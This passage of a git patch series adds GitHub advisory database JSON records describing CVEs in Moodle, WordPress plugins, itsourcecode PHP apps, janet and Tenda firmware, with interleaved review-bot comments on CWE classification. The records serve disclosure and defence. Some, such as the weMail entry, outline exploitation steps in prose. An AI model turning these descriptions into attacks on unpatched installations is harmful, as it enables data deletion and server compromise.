+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27531"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-f678-w5rv-9j99/GHSA-f678-w5rv-9j99.json b/advisories/unreviewed/2026/02/GHSA-f678-w5rv-9j99/GHSA-f678-w5rv-9j99.json
new file mode 100644
index 0000000000000..ea2fab6669051
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-f678-w5rv-9j99/GHSA-f678-w5rv-9j99.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f678-w5rv-9j99",
+ "modified": "2026-02-21T06:30:15Z",
+ "published": "2026-02-21T06:30:15Z",
+ "aliases": [
+ "CVE-2026-27529"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27529"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-ggxq-2mg9-8966/GHSA-ggxq-2mg9-8966.json b/advisories/unreviewed/2026/02/GHSA-ggxq-2mg9-8966/GHSA-ggxq-2mg9-8966.json
new file mode 100644
index 0000000000000..b148e03e302cb
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-ggxq-2mg9-8966/GHSA-ggxq-2mg9-8966.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-ggxq-2mg9-8966",
+ "modified": "2026-02-21T06:30:16Z",
+ "published": "2026-02-21T06:30:16Z",
+ "aliases": [
+ "CVE-2026-26045"
+ ],
+ "details": "A flaw was identified in Moodle’s backup restore functionality where specially crafted backup files were not properly validated during processing. If a malicious backup file is restored, it could lead to unintended execution of server-side code. Since restore capabilities are typically available to privileged users, exploitation requires authenticated access. Successful exploitation could result in full compromise of the Moodle server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26045"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2026-26045"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440901"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T06:16:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json b/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json
new file mode 100644
index 0000000000000..38c5ed7ac5e73
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rx5p-47h9-9hv2",
+ "modified": "2026-02-21T06:30:16Z",
+ "published": "2026-02-21T06:30:16Z",
+ "aliases": [
+ "CVE-2026-27534"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27534"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json b/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json
new file mode 100644
index 0000000000000..040c89dce81ae
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vjq9-53r9-j2x9",
+ "modified": "2026-02-21T06:30:16Z",
+ "published": "2026-02-21T06:30:16Z",
+ "aliases": [
+ "CVE-2026-27532"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27532"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json b/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json
new file mode 100644
index 0000000000000..77b64472fd814
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w8g9-9cxr-c95j",
+ "modified": "2026-02-21T06:30:16Z",
+ "published": "2026-02-21T06:30:16Z",
+ "aliases": [
+ "CVE-2026-27533"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27533"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T05:17:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json b/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json
new file mode 100644
index 0000000000000..5d63eb5fee125
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x835-c867-m9pw", + "modified": "2026-02-21T06:30:17Z", + "published": "2026-02-21T06:30:17Z", + "aliases": [ + "CVE-2026-2863" + ], + "details": "A flaw has been found in feng_ha_ha/megagao ssm-erp and production_ssm up to 4288d53bd35757b27f2d070057aefb2c07bdd097. The impacted element is the function deleteFile of the file FileServiceImpl.java. This manipulation causes path traversal. The attack can be initiated remotely. The exploit has been published and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. This product is distributed under two entirely different names. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2863" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/37" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/37#issue-3914979380" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347102" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347102" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754530" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T06:17:02Z" + } +} \ No newline at end of file From 1cb2f156da40a8fac57d4aff87e4f0ddecaf0bd1 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 09:35:42 +0000 Subject: [PATCH 35/77] Publish Advisories GHSA-jxwf-hc6h-vhc7 GHSA-qj2h-hx88-46hp --- .../GHSA-jxwf-hc6h-vhc7.json | 56 +++++++++++++++++++ .../GHSA-qj2h-hx88-46hp.json | 56 +++++++++++++++++++ 2 files changed, 112 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-jxwf-hc6h-vhc7/GHSA-jxwf-hc6h-vhc7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json diff --git a/advisories/unreviewed/2026/02/GHSA-jxwf-hc6h-vhc7/GHSA-jxwf-hc6h-vhc7.json b/advisories/unreviewed/2026/02/GHSA-jxwf-hc6h-vhc7/GHSA-jxwf-hc6h-vhc7.json new file mode 100644 index 0000000000000..95ec3ea18acc5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jxwf-hc6h-vhc7/GHSA-jxwf-hc6h-vhc7.json 
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jxwf-hc6h-vhc7",
+ "modified": "2026-02-21T09:33:57Z",
+ "published": "2026-02-21T09:33:57Z",
+ "aliases": [
+ "CVE-2026-2865"
+ ],
+ "details": "A vulnerability was found in itsourcecode Agri-Trading Online Shopping System 1.0. This impacts an unknown function of the file admin/productcontroller.php of the component HTTP POST Request Handler. Performing a manipulation of the argument Product results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2865"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/wan1yan/cve/issues/3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://itsourcecode.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347104"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347104"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754556"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T08:16:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json b/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json
new file mode 100644
index 0000000000000..e03291f779f03
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json
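Review bot: `cwe_ids` in GHSA-jxwf-hc6h-vhc7 lists only `CWE-74`, although `details` names the flaw as SQL injection through the `Product` argument of `admin/productcontroller.php`. `CWE-74` is the generic injection parent, so triage rules or dashboards keyed on `CWE-89` will not pick this record up. If the upstream entry allows it, `"cwe_ids": ["CWE-74", "CWE-89"]` keeps the synced value and adds the specific class. GHSA-f72j-hx3j-hhxx in patch 37 has the same mismatch for `/billaction.php`.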
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qj2h-hx88-46hp",
+ "modified": "2026-02-21T09:33:57Z",
+ "published": "2026-02-21T09:33:57Z",
+ "aliases": [
+ "CVE-2026-2864"
+ ],
+ "details": "A vulnerability has been found in feng_ha_ha/megagao ssm-erp and production_ssm up to 4288d53bd35757b27f2d070057aefb2c07bdd097. This affects the function pictureDelete of the file PictureController.java. Such manipulation of the argument picName leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. This product is distributed under two entirely different names. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2864"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/megagao/production_ssm/issues/38"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/megagao/production_ssm/issues/38#issue-3915113401"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347103"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347103"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754557"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T08:16:12Z"
+ }
+}
\ No newline at end of file
From b81a27c63d559f7ca88122bf97ed2e241ba0abbe Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 12:31:44 +0000 Subject: [PATCH 36/77] Publish Advisories GHSA-vjr6-wpqm-j5fj GHSA-whp7-fpv9-q2pq --- .../GHSA-vjr6-wpqm-j5fj.json | 44 ++++++++++++++++ .../GHSA-whp7-fpv9-q2pq.json | 52 +++++++++++++++++++ 2 files changed, 96 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json diff --git a/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json b/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json new file mode 100644 index 0000000000000..f27c8ffd51e51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json 
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vjr6-wpqm-j5fj",
+ "modified": "2026-02-21T12:30:26Z",
+ "published": "2026-02-21T12:30:26Z",
+ "aliases": [
+ "CVE-2026-1787"
+ ],
+ "details": "The LearnPress Export Import – WordPress extension for LearnPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'delete_migrated_data' function in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to delete course that have been migrated from Tutor LMS. The Tutor LMS plugin must be installed and activated in order to exploit the vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1787"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/learnpress-import-export/tags/4.1.0/inc/Migration/Controllers/TutorMigrationController.php#L55"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3458589"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7bde915d-092a-452b-a0e0-ce5c2ce203dc?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T11:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json b/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json
new file mode 100644
index 0000000000000..22dc6936280a6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-whp7-fpv9-q2pq",
+ "modified": "2026-02-21T12:30:26Z",
+ "published": "2026-02-21T12:30:26Z",
+ "aliases": [
+ "CVE-2025-14339"
+ ],
+ "details": "The weMail - Email Marketing, Lead Generation, Optin Forms, Email Newsletters, A/B Testing, and Automation plugin for WordPress is vulnerable to unauthorized form deletion in all versions up to, and including, 2.0.7. This is due to the `Forms::permission()` callback only validating the `X-WP-Nonce` header without checking user capabilities. Since the REST nonce is exposed to unauthenticated visitors via the `weMail` JavaScript object on pages with weMail forms, any unauthenticated user can permanently delete all weMail forms by extracting the nonce from the page source and sending a DELETE request to the forms endpoint.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14339"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/FrontEnd/Scripts.php#L32"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Forms.php#L124"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Forms.php#L222"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3442404%40wemail%2Ftrunk&old=3423372%40wemail%2Ftrunk&sfp_email=&sfph_mail=#file1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/16dd90c3-3962-4c8e-993f-b6824c48ab76?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T10:16:11Z"
+ }
+}
\ No newline at end of file From 44095bdc302bda07549179ac15e75894e3169a5e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 15:32:46 +0000 Subject: [PATCH 37/77] Publish Advisories GHSA-925f-q35m-63gx GHSA-f72j-hx3j-hhxx GHSA-wpqj-9q8f-r6hc --- .../GHSA-925f-q35m-63gx.json | 68 +++++++++++++++++++ .../GHSA-f72j-hx3j-hhxx.json | 56 +++++++++++++++ .../GHSA-wpqj-9q8f-r6hc.json | 56 +++++++++++++++ 3 files changed, 180 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-925f-q35m-63gx/GHSA-925f-q35m-63gx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f72j-hx3j-hhxx/GHSA-f72j-hx3j-hhxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json diff --git a/advisories/unreviewed/2026/02/GHSA-925f-q35m-63gx/GHSA-925f-q35m-63gx.json b/advisories/unreviewed/2026/02/GHSA-925f-q35m-63gx/GHSA-925f-q35m-63gx.json new file mode 100644 index 0000000000000..a17493738d29e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-925f-q35m-63gx/GHSA-925f-q35m-63gx.json 
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-925f-q35m-63gx", + "modified": "2026-02-21T15:31:33Z", + "published": "2026-02-21T15:31:33Z", + "aliases": [ + "CVE-2026-2869" + ], + "details": "A vulnerability was identified in janet-lang janet up to 1.40.1. Affected by this vulnerability is the function janetc_varset of the file src/core/specials.c of the component handleattr Handler. The manipulation leads to out-of-bounds read. The attack can only be performed from a local environment. The exploit is publicly available and might be used. Upgrading to version 1.41.0 addresses this issue. The identifier of the patch is 2fabc80151a2b8834ee59cda8a70453f848b40e5. The affected component should be upgraded.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2869" + }, + { + "type": "WEB", + "url": "https://github.com/janet-lang/janet/issues/1699" + }, + { + "type": "WEB", + "url": "https://github.com/janet-lang/janet/commit/2fabc80151a2b8834ee59cda8a70453f848b40e5" + }, + { + "type": "WEB", + "url": "https://github.com/janet-lang/janet" + }, + { + "type": "WEB", + "url": "https://github.com/janet-lang/janet/releases/tag/v1.41.0" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0123/blob/main/ja1/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347106" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347106" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754589" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + 
"nvd_published_at": "2026-02-21T15:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f72j-hx3j-hhxx/GHSA-f72j-hx3j-hhxx.json b/advisories/unreviewed/2026/02/GHSA-f72j-hx3j-hhxx/GHSA-f72j-hx3j-hhxx.json new file mode 100644 index 0000000000000..bf51751b3a5df --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f72j-hx3j-hhxx/GHSA-f72j-hx3j-hhxx.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f72j-hx3j-hhxx", + "modified": "2026-02-21T15:31:33Z", + "published": "2026-02-21T15:31:33Z", + "aliases": [ + "CVE-2026-2867" + ], + "details": "A vulnerability was determined in itsourcecode Vehicle Management System 1.0. Affected is an unknown function of the file /billaction.php. Executing a manipulation of the argument ID can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2867" + }, + { + "type": "WEB", + "url": "https://github.com/wan1yan/cve/issues/4" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347105" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347105" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754578" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T14:15:57Z" + } +} \ No newline at end of file 
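Review bot: `cwe_ids` in GHSA-925f-q35m-63gx carries the generic `"CWE-119"`, while `details` describes an out-of-bounds read in `janetc_varset`; `"CWE-125"` is the specific class and keeps read-side faults apart from write overflows when records are triaged by CWE. `details` names the fixed release (1.41.0) and the patch commit, but `affected` is empty, so the "up to 1.40.1" bound exists only as prose.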
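Review bot: `cwe_ids` in GHSA-f72j-hx3j-hhxx lists only `"CWE-74"`, although `details` states SQL injection through the `ID` argument of `/billaction.php`; `"CWE-89"` is the specific child class and is what CWE-based filters for SQL injection normally key on. The generic value presumably comes from the upstream source rather than from this sync. The record names no fixed version, so it documents exposure of version 1.0 only.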
diff --git a/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json b/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json new file mode 100644 index 0000000000000..18e5ff273bdf6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpqj-9q8f-r6hc", + "modified": "2026-02-21T15:31:34Z", + "published": "2026-02-21T15:31:34Z", + "aliases": [ + "CVE-2026-2870" + ], + "details": "A security flaw has been discovered in Tenda A21 1.0.0.0. Affected by this issue is the function set_qosMib_list of the file /goform/formSetQosBand. The manipulation of the argument list results in stack-based buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2870" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754627" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T15:15:59Z" + } +} \ No newline at end of file From 30c32764cbeae52175a6e0c9fe152ab3bee65129 Mon Sep 17 00:00:00 2001 
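Review bot: `"CWE-119"` in GHSA-wpqj-9q8f-r6hc is the generic memory-bounds class, while `details` states a stack-based buffer overflow in `set_qosMib_list`; `"CWE-121"` would record that precisely. The same generic value is used for the other Tenda A21/A18 and D-Link DWR-M960 stack-overflow records later in this series (for example GHSA-2j3g-5jhm-r285, GHSA-6238-4w9x-vrrr, GHSA-69vg-2v33-6p2v and GHSA-7597-723j-pwr9). None of these records names a fixed firmware release, so the single build quoted in `details` is the only version information available.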
